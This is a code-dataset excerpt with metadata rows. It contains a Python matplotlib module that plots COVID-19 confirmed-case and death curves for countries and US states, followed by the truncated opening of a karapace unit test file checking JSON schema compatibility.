| 33 | 73 | 0.661656 | 534 | 4,191 | 4.825843 | 0.116105 | 0.103221 | 0.147458 | 0.097788 | 0.902212 | 0.885526 | 0.842064 | 0.819558 | 0.819558 | 0.819558 | 0 | 0.008844 | 0.190647 | 4,191 | 126 | 74 | 33.261905 | 0.750884 | 0 | 0 | 0.802326 | 0 | 0 | 0.097136 | 0 | 0 | 0 | 0 | 0 | 0.255814 | 1 | 0.372093 | false | 0 | 0.023256 | 0.081395 | 0.55814 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
2914d34e167c17c9cbadf1dd02a9f1c73d3db886 | 9,663 | py | Python | utils/plot.py | secregister01/2020-04-13_COVID19-N20 | 145e914d9288b323a7c249f00eaa7e649e6b2049 | [
"Unlicense"
] | 4 | 2020-04-21T00:30:15.000Z | 2020-05-06T18:53:13.000Z | utils/plot.py | secregister01/2020-04-13_COVID19-N20 | 145e914d9288b323a7c249f00eaa7e649e6b2049 | [
"Unlicense"
] | 1 | 2020-04-28T21:05:18.000Z | 2020-04-29T20:47:43.000Z | utils/plot.py | secregister01/2020-04-13_COVID19-N20 | 145e914d9288b323a7c249f00eaa7e649e6b2049 | [
"Unlicense"
] | 1 | 2020-04-25T17:49:18.000Z | 2020-04-25T17:49:18.000Z | from utils import *
from utils.paths import *
import utils.paths as p
countries, index_country, country_index = get_countries()
states, index_state, state_index = get_us_states()
#---------------------------Countries--------------------------------------
# plot cumulative cases multicountry
def plot_cumulative_multi_country(selected_countries):
assert p.DATE == "DateWorld"
plt.clf()
countries = [index_country[c] for c in selected_countries]
plt.title("Cumulative Confirmed Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Confirmed Cases")
for country in countries:
df_country = pd.read_csv(f"{p.DRP}/{country}.csv")
plt.plot(df_country["tagged_day"], df_country["confirmed"], label=country)
plt.legend(countries, loc='center left', bbox_to_anchor=(1, 0.5))
def plot_normalized_cumulative_multi_country(selected_countries):
assert p.DATE == "DateWorld"
plt.clf()
countries = [index_country[c] for c in selected_countries]
plt.title("Normalized Cumulative Confirmed Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Normalized Confirmed Cases")
for country in countries:
population = country_population[country]
area = country_area[country]
density = population / area
#display(f"{country},{population},{area},{density}")
if density > 0:
df_country = pd.read_csv(f"{p.DRP}/{country}.csv")
plt.plot(df_country["tagged_day"], df_country["confirmed"]/density, label=country)
plt.legend(countries, loc='center left', bbox_to_anchor=(1, 0.5))
# plot new comfirmed cases multicountry
def plot_new_confirmed_multi_country(selected_countries):
assert p.DATE == "DateWorld"
plt.clf()
countries = [index_country[c] for c in selected_countries]
plt.title("New Daily Confirmed Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("New Confirmed Cases")
for country in countries:
df_country = pd.read_csv(f"{p.DRP}/{country}.csv")
plt.plot(df_country["tagged_day"], df_country["new_confirmed"], label=country)
plt.legend(countries, loc='center left', bbox_to_anchor=(1, 0.5))
# plot deaths cases multicountry
def plot_deaths_multi_country(selected_countries):
assert p.DATE == "DateWorld"
plt.clf()
countries = [index_country[c] for c in selected_countries]
plt.title("Cumulative Death Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Death Cases")
for country in countries:
df_country = pd.read_csv(f"{p.DRP}/{country}.csv")
plt.plot(df_country["tagged_day"], df_country["deaths"], label=country)
plt.legend(countries, loc='center left', bbox_to_anchor=(1, 0.5))
def plot_normalized_deaths_multi_country(selected_countries):
assert p.DATE == "DateWorld"
plt.clf()
countries = [index_country[c] for c in selected_countries]
plt.title("Normalized Cumulative Death Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Normalized Death Cases")
for country in countries:
population = country_population[country]
area = country_area[country]
density = population / area
if density > 0:
df_country = pd.read_csv(f"{p.DRP}/{country}.csv")
plt.plot(df_country["tagged_day"], df_country["deaths"]/density, label=country)
plt.legend(countries, loc='center left', bbox_to_anchor=(1, 0.5))
def plot_new_deaths_multi_country(selected_countries):
assert p.DATE == "DateWorld"
plt.clf()
countries = [index_country[c] for c in selected_countries]
plt.title("Daily Death Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Daily Death Cases")
for country in countries:
df_country = pd.read_csv(f"{p.DRP}/{country}.csv")
plt.plot(df_country["tagged_day"], df_country["new_deaths"], label=country)
plt.legend(countries, loc='center left', bbox_to_anchor=(1, 0.5))
def plot_cumulative_country_save(country_index):
assert p.DATE == "DateWorld"
country = index_country[country_index]
df = pd.read_csv(f"{p.DRP}/{country}.csv")
plt.clf()
plt.title(f"{country} Confirmed Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Confirmed Cases")
plt.bar(df["tagged_day"], df["confirmed"])
plt.savefig(f"{p.CUM}/{country}.jpg")
plt.clf()
def plot_deaths_country_save(country_index):
assert p.DATE == "DateWorld"
country = index_country[country_index]
df = pd.read_csv(f"{p.DRP}/{country}.csv")
plt.title(f"{country} Death Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Death Cases")
plt.bar(df["tagged_day"], df["deaths"])
plt.savefig(f"{p.DEA}/{country}.jpg")
plt.clf()
def plot_new_confirmed_new_deaths_country(country_index):
assert p.DATE == "DateWorld"
country = index_country[country_index]
df_country = pd.read_csv(f"{p.DRP}/{country}.csv")
plt.clf()
# plt.ylabel("Cases")
plt.title("Title")
plt.subplot(211)
# plt.title(f"{country} Daily New Confirmed Cases")
plt.bar(df_country['tagged_day'], df_country['new_confirmed'])
plt.ylabel("New Confirmed Cases")
plt.subplot(212)
#plt.title(f"{country} Daily Death Cases")
plt.bar(df_country['tagged_day'], df_country['new_deaths'])
plt.xlabel(f"Day in {country} since N=20")
plt.ylabel("New Death Cases")
# plt.legend(['Daily New Confirmed Cases', 'Daily Death Cases'], bbox_to_anchor=(1, 0.5))
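# Framework-free sketch of the two-panel bar layout used above (matplotlib
# only; the numbers are invented for illustration):
def _demo_two_panel_bars():
    import matplotlib.pyplot as plt
    days, confirmed, deaths = [1, 2, 3], [5, 9, 14], [0, 1, 2]
    plt.subplot(211)  # top panel
    plt.bar(days, confirmed)
    plt.ylabel("New Confirmed Cases")
    plt.subplot(212)  # bottom panel of the same figure
    plt.bar(days, deaths)
    plt.xlabel("Day")
    plt.ylabel("New Death Cases")
    plt.show()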
#---------------------------US States--------------------------------------
# plot cumulative cases multistate
def plot_cumulative_multi_state(selected_states):
assert p.DATE == "DateUS"
plt.clf()
states = [index_state[c] for c in selected_states]
plt.title("Cumulative Confirmed Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Confirmed Cases")
for state in states:
df_state = pd.read_csv(f"{p.DRP}/{state}.csv")
plt.plot(df_state["tagged_day"], df_state["confirmed"], label=state)
plt.legend(states, loc='center left', bbox_to_anchor=(1, 0.5))
# def plot_normalized_cumulative_multi_state(selected_states):
# assert p.DATE == "DateUS"
# plt.clf()
# states = [index_state[c] for c in selected_states]
# plt.title("Normalized Cumulative Confirmed Cases Since N=20")
# plt.xlabel("Day")
# plt.ylabel("Normalized Confirmed Cases")
# for state in states:
# population = state_population[state]
# area = state_area[state]
# density = population / area
# #display(f"{state},{population},{area},{density}")
# if density > 0:
# df_state = pd.read_csv(f"{p.DRP}/{state}.csv")
# plt.plot(df_state["tagged_day"], df_state["confirmed"]/density, label=state)
# plt.legend(states, loc='center left', bbox_to_anchor=(1, 0.5))
# plot new comfirmed cases multistate
def plot_new_confirmed_multi_state(selected_states):
assert p.DATE == "DateUS"
plt.clf()
states = [index_state[c] for c in selected_states]
plt.title("New Daily Confirmed Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("New Confirmed Cases")
for state in states:
df_state = pd.read_csv(f"{p.DRP}/{state}.csv")
plt.plot(df_state["tagged_day"], df_state["new_confirmed"], label=state)
plt.legend(states, loc='center left', bbox_to_anchor=(1, 0.5))
# plot deaths cases multistate
def plot_deaths_multi_state(selected_states):
assert p.DATE == "DateUS"
plt.clf()
states = [index_state[c] for c in selected_states]
plt.title("Cumulative Death Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Death Cases")
for state in states:
df_state = pd.read_csv(f"{p.DRP}/{state}.csv")
plt.plot(df_state["tagged_day"], df_state["deaths"], label=state)
plt.legend(states, loc='center left', bbox_to_anchor=(1, 0.5))
# def plot_normalized_deaths_multi_state(selected_states):
# assert p.DATE == "DateUS"
# plt.clf()
# states = [index_state[c] for c in selected_states]
# plt.title("Normalized Cumulative Death Cases Since N=20")
# plt.xlabel("Day")
# plt.ylabel("Normalized Death Cases")
# for state in states:
# population = state_population[state]
# area = state_area[state]
# density = population / area
# if density > 0:
# df_state = pd.read_csv(f"{p.DRP}/{state}.csv")
# plt.plot(df_state["tagged_day"], df_state["deaths"]/density, label=state)
# plt.legend(states, loc='center left', bbox_to_anchor=(1, 0.5))
def plot_new_deaths_multi_state(selected_states):
assert p.DATE == "DateUS"
plt.clf()
states = [index_state[c] for c in selected_states]
plt.title("Daily Death Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Daily Death Cases")
for state in states:
df_state = pd.read_csv(f"{p.DRP}/{state}.csv")
plt.plot(df_state["tagged_day"], df_state["new_deaths"], label=state)
plt.legend(states, loc='center left', bbox_to_anchor=(1, 0.5))
def plot_cumulative_state_save(state_index):
assert p.DATE == "DateUS"
state = index_state[state_index]
df = pd.read_csv(f"{p.DRP}/{state}.csv")
plt.clf()
plt.title(f"{state} Confirmed Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Confirmed Cases")
plt.bar(df["tagged_day"], df["confirmed"])
plt.savefig(f"{p.CUM}/{state}.jpg")
plt.clf()
def plot_deaths_state_save(state_index):
assert p.DATE == "DateUS"
state = index_state[state_index]
df = pd.read_csv(f"{p.DRP}/{state}.csv")
plt.title(f"{state} Death Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Death Cases")
plt.bar(df["tagged_day"], df["deaths"])
plt.savefig(f"{p.DEA}/{state}.jpg")
plt.clf()
def plot_new_confirmed_new_deaths_state(state_index):
assert p.DATE == "DateUS"
state = index_state[state_index]
df_state = pd.read_csv(f"{p.DRP}/{state}.csv")
plt.clf()
# plt.ylabel("Cases")
plt.title("Title")
plt.subplot(211)
# plt.title(f"{state} Daily New Confirmed Cases")
plt.bar(df_state['tagged_day'], df_state['new_confirmed'])
plt.ylabel("New Confirmed Cases")
plt.subplot(212)
#plt.title(f"{state} Daily Death Cases")
plt.bar(df_state['tagged_day'], df_state['new_deaths'])
plt.xlabel(f"Day in {state} since N=20")
plt.ylabel("New Death Cases")
# plt.legend(['Daily New Confirmed Cases', 'Daily Death Cases'], bbox_to_anchor=(1, 0.5))
| 36.05597 | 90 | 0.714788 | 1,496 | 9,663 | 4.446524 | 0.050802 | 0.031118 | 0.033073 | 0.029765 | 0.946332 | 0.934606 | 0.919573 | 0.903638 | 0.901834 | 0.89071 | 0 | 0.010979 | 0.11394 | 9,663 | 268 | 91 | 36.05597 | 0.765943 | 0.211322 | 0 | 0.743456 | 0 | 0 | 0.24693 | 0.030503 | 0 | 0 | 0 | 0 | 0.08377 | 1 | 0.08377 | false | 0 | 0.015707 | 0 | 0.099476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
294abc66c3ba6656699878f26540ce0af1481571 | 44,910 | py | Python | tests/unit/test_json_schema.py | galvo/karapace | fa4b455a7153a560d7cf0a3530b82f25bd6dd8a4 | [
"Apache-2.0"
] | 180 | 2019-01-16T15:35:36.000Z | 2022-03-29T10:01:10.000Z | tests/unit/test_json_schema.py | galvo/karapace | fa4b455a7153a560d7cf0a3530b82f25bd6dd8a4 | [
"Apache-2.0"
] | 175 | 2020-03-19T12:53:05.000Z | 2022-03-31T16:26:55.000Z | tests/unit/test_json_schema.py | galvo/karapace | fa4b455a7153a560d7cf0a3530b82f25bd6dd8a4 | [
"Apache-2.0"
] | 32 | 2019-01-16T16:12:25.000Z | 2022-03-30T07:14:57.000Z | from jsonschema import Draft7Validator
from karapace.avro_compatibility import SchemaCompatibilityResult
from karapace.compatibility.jsonschema.checks import compatibility
from tests.schemas.json_schemas import (
A_DINT_B_DINT_OBJECT_SCHEMA, A_DINT_B_INT_OBJECT_SCHEMA, A_DINT_B_NUM_C_DINT_OBJECT_SCHEMA, A_DINT_B_NUM_OBJECT_SCHEMA,
A_DINT_OBJECT_SCHEMA, A_INT_B_DINT_OBJECT_SCHEMA, A_INT_B_DINT_REQUIRED_OBJECT_SCHEMA, A_INT_B_INT_OBJECT_SCHEMA,
A_INT_B_INT_REQUIRED_OBJECT_SCHEMA, A_INT_OBJECT_SCHEMA, A_INT_OPEN_OBJECT_SCHEMA, A_OBJECT_SCHEMA, ARRAY_OF_INT_SCHEMA,
ARRAY_OF_NUMBER_SCHEMA, ARRAY_OF_POSITIVE_INTEGER, ARRAY_OF_POSITIVE_INTEGER_THROUGH_REF, ARRAY_OF_STRING_SCHEMA,
ARRAY_SCHEMA, B_DINT_OPEN_OBJECT_SCHEMA, B_INT_OBJECT_SCHEMA, B_INT_OPEN_OBJECT_SCHEMA, B_NUM_C_DINT_OPEN_OBJECT_SCHEMA,
B_NUM_C_INT_OBJECT_SCHEMA, B_NUM_C_INT_OPEN_OBJECT_SCHEMA, BOOLEAN_SCHEMA, BOOLEAN_SCHEMAS, EMPTY_OBJECT_SCHEMA,
EMPTY_SCHEMA, ENUM_AB_SCHEMA, ENUM_ABC_SCHEMA, ENUM_BC_SCHEMA, EVERY_TYPE_SCHEMA,
EXCLUSIVE_MAXIMUM_DECREASED_INTEGER_SCHEMA, EXCLUSIVE_MAXIMUM_DECREASED_NUMBER_SCHEMA, EXCLUSIVE_MAXIMUM_INTEGER_SCHEMA,
EXCLUSIVE_MAXIMUM_NUMBER_SCHEMA, EXCLUSIVE_MINIMUM_INCREASED_INTEGER_SCHEMA, EXCLUSIVE_MINIMUM_INCREASED_NUMBER_SCHEMA,
EXCLUSIVE_MINIMUM_INTEGER_SCHEMA, EXCLUSIVE_MINIMUM_NUMBER_SCHEMA, FALSE_SCHEMA, INT_SCHEMA, MAX_ITEMS_DECREASED_SCHEMA,
MAX_ITEMS_SCHEMA, MAX_LENGTH_DECREASED_SCHEMA, MAX_LENGTH_SCHEMA, MAX_PROPERTIES_DECREASED_SCHEMA, MAX_PROPERTIES_SCHEMA,
MAXIMUM_DECREASED_INTEGER_SCHEMA, MAXIMUM_DECREASED_NUMBER_SCHEMA, MAXIMUM_INTEGER_SCHEMA, MAXIMUM_NUMBER_SCHEMA,
MIN_ITEMS_INCREASED_SCHEMA, MIN_ITEMS_SCHEMA, MIN_LENGTH_INCREASED_SCHEMA, MIN_LENGTH_SCHEMA, MIN_PATTERN_SCHEMA,
MIN_PATTERN_STRICT_SCHEMA, MIN_PROPERTIES_INCREASED_SCHEMA, MIN_PROPERTIES_SCHEMA, MINIMUM_INCREASED_INTEGER_SCHEMA,
MINIMUM_INCREASED_NUMBER_SCHEMA, MINIMUM_INTEGER_SCHEMA, MINIMUM_NUMBER_SCHEMA, NON_OBJECT_SCHEMAS, NOT_ARRAY_SCHEMA,
NOT_BOOLEAN_SCHEMA, NOT_INT_SCHEMA, NOT_NUMBER_SCHEMA, NOT_OBJECT_SCHEMA, NOT_OF_EMPTY_SCHEMA, NOT_OF_TRUE_SCHEMA,
NOT_STRING_SCHEMA, NUMBER_SCHEMA, OBJECT_SCHEMA, OBJECT_SCHEMAS, ONEOF_ARRAY_A_DINT_B_NUM_SCHEMA,
ONEOF_ARRAY_B_NUM_C_DINT_OPEN_SCHEMA, ONEOF_ARRAY_B_NUM_C_INT_SCHEMA, ONEOF_INT_SCHEMA, ONEOF_NUMBER_SCHEMA,
ONEOF_STRING_INT_SCHEMA, ONEOF_STRING_SCHEMA, PATTERN_PROPERTY_ASTAR_OBJECT_SCHEMA, PROPERTY_NAMES_ASTAR_OBJECT_SCHEMA,
STRING_SCHEMA, TRUE_SCHEMA, TUPLE_OF_INT_INT_OPEN_SCHEMA, TUPLE_OF_INT_INT_SCHEMA, TUPLE_OF_INT_OPEN_SCHEMA,
TUPLE_OF_INT_SCHEMA, TUPLE_OF_INT_WITH_ADDITIONAL_INT_SCHEMA, TYPES_STRING_INT_SCHEMA, TYPES_STRING_SCHEMA
)
COMPATIBLE = SchemaCompatibilityResult.compatible()
COMPATIBILIY = "compatibility with schema registry"
COMPATIBLE_READER_IS_TRUE_SCHEMA = "The reader is a true schema which _accepts_ every value"
COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES = "The reader schema is an open schema and ignores unknown values"
COMPATIBLE_READER_NEW_FIELD_IS_NOT_REQUIRED = "The new fields in the reader schema are not required"
COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET = "The reader schema changed a field type which accepts all writer values"
COMPATIBLE_READER_EVERY_VALUE_IS_ACCEPTED = "Every value produced by the writer is accepted by the reader"
INCOMPATIBLE_READER_IS_FALSE_SCHEMA = "The reader is a false schema which _rejects_ every value"
INCOMPATIBLE_READER_IS_CLOSED_AND_REMOVED_FIELD = "The reader does not accept all fields produced by the writer"
INCOMPATIBLE_READER_HAS_A_NEW_REQUIRED_FIELDg = "The reader has a new required field"
INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES = (
"The reader changed restricted field and only accept a subset of the writer's values"
)
INCOMPATIBLE_READER_CHANGED_FIELD_TYPE = "The reader schema changed a field type, the previous values are no longer valid"
def schemas_are_compatible(
reader: Draft7Validator,
writer: Draft7Validator,
msg: str,
) -> None:
assert compatibility(reader=reader, writer=writer) == COMPATIBLE, msg
def not_schemas_are_compatible(
reader: Draft7Validator,
writer: Draft7Validator,
msg: str,
) -> None:
assert compatibility(reader=reader, writer=writer) != COMPATIBLE, msg
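# A tiny concrete use of the helpers above with inline Draft7Validator
# instances (these schema literals are illustrative, not taken from
# tests.schemas.json_schemas):
def _example_widening_is_compatible() -> None:
    number_reader = Draft7Validator({"type": "number"})
    integer_writer = Draft7Validator({"type": "integer"})
    # every integer the writer can produce is a valid number for the reader
    schemas_are_compatible(
        reader=number_reader,
        writer=integer_writer,
        msg="a number reader accepts every integer",
    )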
def test_reflexivity() -> None:
reflexivity_msg = "every schema is compatible with itself"
schemas_are_compatible(
reader=EVERY_TYPE_SCHEMA,
writer=EVERY_TYPE_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=NOT_OF_EMPTY_SCHEMA,
writer=NOT_OF_EMPTY_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=NOT_OF_TRUE_SCHEMA,
writer=NOT_OF_TRUE_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=FALSE_SCHEMA,
writer=FALSE_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=TRUE_SCHEMA,
writer=TRUE_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EMPTY_SCHEMA,
writer=EMPTY_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=BOOLEAN_SCHEMA,
writer=BOOLEAN_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=INT_SCHEMA,
writer=INT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=NUMBER_SCHEMA,
writer=NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=STRING_SCHEMA,
writer=STRING_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=OBJECT_SCHEMA,
writer=OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ARRAY_SCHEMA,
writer=ARRAY_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=NOT_BOOLEAN_SCHEMA,
writer=NOT_BOOLEAN_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=NOT_INT_SCHEMA,
writer=NOT_INT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=NOT_NUMBER_SCHEMA,
writer=NOT_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=NOT_STRING_SCHEMA,
writer=NOT_STRING_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=NOT_OBJECT_SCHEMA,
writer=NOT_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=NOT_ARRAY_SCHEMA,
writer=NOT_ARRAY_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAX_LENGTH_SCHEMA,
writer=MAX_LENGTH_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAX_LENGTH_DECREASED_SCHEMA,
writer=MAX_LENGTH_DECREASED_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MIN_LENGTH_SCHEMA,
writer=MIN_LENGTH_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MIN_LENGTH_INCREASED_SCHEMA,
writer=MIN_LENGTH_INCREASED_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MIN_PATTERN_SCHEMA,
writer=MIN_PATTERN_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MIN_PATTERN_STRICT_SCHEMA,
writer=MIN_PATTERN_STRICT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAXIMUM_INTEGER_SCHEMA,
writer=MAXIMUM_INTEGER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAXIMUM_NUMBER_SCHEMA,
writer=MAXIMUM_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAXIMUM_DECREASED_INTEGER_SCHEMA,
writer=MAXIMUM_DECREASED_INTEGER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAXIMUM_DECREASED_NUMBER_SCHEMA,
writer=MAXIMUM_DECREASED_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MINIMUM_INTEGER_SCHEMA,
writer=MINIMUM_INTEGER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MINIMUM_NUMBER_SCHEMA,
writer=MINIMUM_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MINIMUM_INCREASED_INTEGER_SCHEMA,
writer=MINIMUM_INCREASED_INTEGER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MINIMUM_INCREASED_NUMBER_SCHEMA,
writer=MINIMUM_INCREASED_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EXCLUSIVE_MAXIMUM_INTEGER_SCHEMA,
writer=EXCLUSIVE_MAXIMUM_INTEGER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EXCLUSIVE_MAXIMUM_NUMBER_SCHEMA,
writer=EXCLUSIVE_MAXIMUM_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EXCLUSIVE_MAXIMUM_DECREASED_INTEGER_SCHEMA,
writer=EXCLUSIVE_MAXIMUM_DECREASED_INTEGER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EXCLUSIVE_MAXIMUM_DECREASED_NUMBER_SCHEMA,
writer=EXCLUSIVE_MAXIMUM_DECREASED_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EXCLUSIVE_MINIMUM_INTEGER_SCHEMA,
writer=EXCLUSIVE_MINIMUM_INTEGER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EXCLUSIVE_MINIMUM_NUMBER_SCHEMA,
writer=EXCLUSIVE_MINIMUM_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EXCLUSIVE_MINIMUM_INCREASED_INTEGER_SCHEMA,
writer=EXCLUSIVE_MINIMUM_INCREASED_INTEGER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EXCLUSIVE_MINIMUM_INCREASED_NUMBER_SCHEMA,
writer=EXCLUSIVE_MINIMUM_INCREASED_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAX_PROPERTIES_SCHEMA,
writer=MAX_PROPERTIES_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAX_PROPERTIES_DECREASED_SCHEMA,
writer=MAX_PROPERTIES_DECREASED_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MIN_PROPERTIES_SCHEMA,
writer=MIN_PROPERTIES_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MIN_PROPERTIES_INCREASED_SCHEMA,
writer=MIN_PROPERTIES_INCREASED_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAX_ITEMS_SCHEMA,
writer=MAX_ITEMS_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAX_ITEMS_DECREASED_SCHEMA,
writer=MAX_ITEMS_DECREASED_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MIN_ITEMS_SCHEMA,
writer=MIN_ITEMS_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MIN_ITEMS_INCREASED_SCHEMA,
writer=MIN_ITEMS_INCREASED_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=TUPLE_OF_INT_INT_SCHEMA,
writer=TUPLE_OF_INT_INT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=TUPLE_OF_INT_SCHEMA,
writer=TUPLE_OF_INT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=TUPLE_OF_INT_WITH_ADDITIONAL_INT_SCHEMA,
writer=TUPLE_OF_INT_WITH_ADDITIONAL_INT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=TUPLE_OF_INT_INT_SCHEMA,
writer=TUPLE_OF_INT_INT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=TUPLE_OF_INT_OPEN_SCHEMA,
writer=TUPLE_OF_INT_OPEN_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ARRAY_OF_INT_SCHEMA,
writer=ARRAY_OF_INT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ARRAY_OF_NUMBER_SCHEMA,
writer=ARRAY_OF_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ARRAY_OF_STRING_SCHEMA,
writer=ARRAY_OF_STRING_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ENUM_AB_SCHEMA,
writer=ENUM_AB_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ENUM_ABC_SCHEMA,
writer=ENUM_ABC_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ENUM_BC_SCHEMA,
writer=ENUM_BC_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ONEOF_STRING_SCHEMA,
writer=ONEOF_STRING_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ONEOF_STRING_INT_SCHEMA,
writer=ONEOF_STRING_INT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EMPTY_OBJECT_SCHEMA,
writer=EMPTY_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=A_INT_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=A_INT_OPEN_OBJECT_SCHEMA,
writer=A_INT_OPEN_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=A_INT_B_INT_OBJECT_SCHEMA,
writer=A_INT_B_INT_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=A_INT_B_INT_REQUIRED_OBJECT_SCHEMA,
writer=A_INT_B_INT_REQUIRED_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=A_INT_B_DINT_OBJECT_SCHEMA,
writer=A_INT_B_DINT_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=A_INT_B_DINT_REQUIRED_OBJECT_SCHEMA,
writer=A_INT_B_DINT_REQUIRED_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=A_DINT_B_DINT_OBJECT_SCHEMA,
writer=A_DINT_B_DINT_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=A_DINT_B_NUM_OBJECT_SCHEMA,
writer=A_DINT_B_NUM_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=A_DINT_B_NUM_C_DINT_OBJECT_SCHEMA,
writer=A_DINT_B_NUM_C_DINT_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=B_NUM_C_DINT_OPEN_OBJECT_SCHEMA,
writer=B_NUM_C_DINT_OPEN_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
